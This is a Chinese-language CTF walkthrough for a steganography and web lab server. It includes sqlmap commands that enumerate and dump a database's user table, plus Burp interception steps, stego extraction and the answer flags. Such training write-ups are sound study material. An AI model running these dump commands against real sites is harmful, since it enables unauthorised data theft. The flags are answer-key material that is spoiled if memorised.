信息隐藏 !!!!!!!!!!!!!"/>
信息隐藏 !!!!!!!!!!!!!
- 通过本地PC中渗透测试平台Kali,对服务器场景Web20200529中的网站进行访问,找到登录界面中的Flag,并将Flag提交;
- 通过本地PC中渗透测试平台Kali对服务器场景Web20200529中的网站进行访问,找到登录界面背景中的Flag,并将Flag提交;
- 通过本地PC中渗透测试平台Kali对服务器场景Web20200529中的网站进行测试,在登录界面中登录,登录成功后在成功的界面中找到Flag并提交;
- 通过本地PC中渗透测试平台Kali对服务器场景Web20200529中的网站进行访问,登录成功后找到页面中的月亮,并将月亮中的信息破解,并将破解后的信息作为FLAG提交;
- 通过本地PC中渗透测试平台Kali,对服务器场景Web20200529中的网站进行访问,登录成功后找到页面中的十字星,将十字星中页面内容进行下载,将下载的文件解密,并将解密后的文件内容作为Flag提交;
- 通过本地PC中渗透测试平台Kali对服务器场景Web20200529中的网站进行访问,在登录界面中登录,登录失败后找到页面中的链接访问并下载文件,将文件中的隐藏文件名全程作为Flag提交;
- 通过本地PC中渗透测试平台Kali对服务器场景Web20200529中的网站进行访问,在登录界面中登录,登录失败后找到界面中的链接访问链接并下载文件,将文件中隐藏信息文件的内容作为Flag提交;
- 通过本地PC中渗透测试平台kali对服务器场景20200529中的网站进行访问,寻找每页中的隐藏信息,将每条信息按顺序合并,作为Flag提交;
如需要环境可以联系本人:1721676697QQ
解析:
第一题:找登录界面的Flag
进F12看,找到Soures选项,在里面找到class.css,往下翻就能找到到flag
Flag:WEKCOME TO CSS!
第二题:使用burp对登录界面进行抓包,然后找到图片复制bgf.jpg,使用burpsuite访问bgf.jpg,然后查找FLAG关键字
在最后的地方FLAG
Flag:Picturemerge
第三题:使用sqlmao工具爆库
sqlmap -u http://172.16.101.250/index.html --forms --level 5 --risk 3 --batch --dbs
我们可以看到特殊数据库 hello
然后我们去爆表
sqlmap -u http://172.16.101.250/index.html --forms --level 5 --risk 3 --batch -D hello --tables
我们可以看到user这个用户
我们再爆用户密码
sqlmap -u http://172.16.101.250/index.html --forms --level 5 --risk 3 --batch -D hello -T user --dump
我们使用burp抓登录包,将username改为123,password改为114514 点击GO ,再点击follow redirection
Flag:4C6F67696E207375636365737366756C
第四题:我们登录成功后会跳转dlc.html页面
点击右上角月亮,出现弹窗
猜测使用base64编码,使用base64 -d解密
还可以用burp抓登录成功的包,也会发现这串字符串,然后使用base64解密结果一样
Flag: Base64decryptedsuccessfully
第五题:题目中说道找到界面中的十字星,利用CTRL+A,可以发现右下角的十字星能点击
点击下载一个test.zip,可以使用winhex将十六进制部分09改为00,然后解压
将所选部分的09改为00
保存出来我们可以看到能打开flag.png了
然后我们放入Kali
Flag:UF71K2TW5JM88QZ8WMNTWKUY4
第六题:题目中说找登录失败后找到页面中的链接
我们抓包,使用burp可以抓一个登录成功的包,然后我们将密码改掉,点击GO 再点击follow redirection
在浏览器中访问treasure,html,访问连接,下载了一个bg.jpg文件
我们使用steghide工具分离这个文件
Flag:a.txt
第七题:我们用vim去看a.txt
我们发现了一个png,试着将a.txt格式改成png
发现flag
Flag:It is over Look back
第八题:找每页中隐藏的信息
第一页 index.html中F12我们可以看到(Hidden messages 1=Please)
第二个页面我们去看class.css
直接CTRL+F搜索hidden
我们发现hidden messages 2 = check
第三个页面去找登录成功的页面dlc.html
htdden messages 3 =every
第四个页面 treasure.html
登录treasure.html这个页面它只闪一下,我们可以使用burp抓包
然后发现 hidden Messages 4 = question
flag就是是个页面结合一下
Flag:Please check every question
更多推荐
信息隐藏 !!!!!!!!!!!!!
发布评论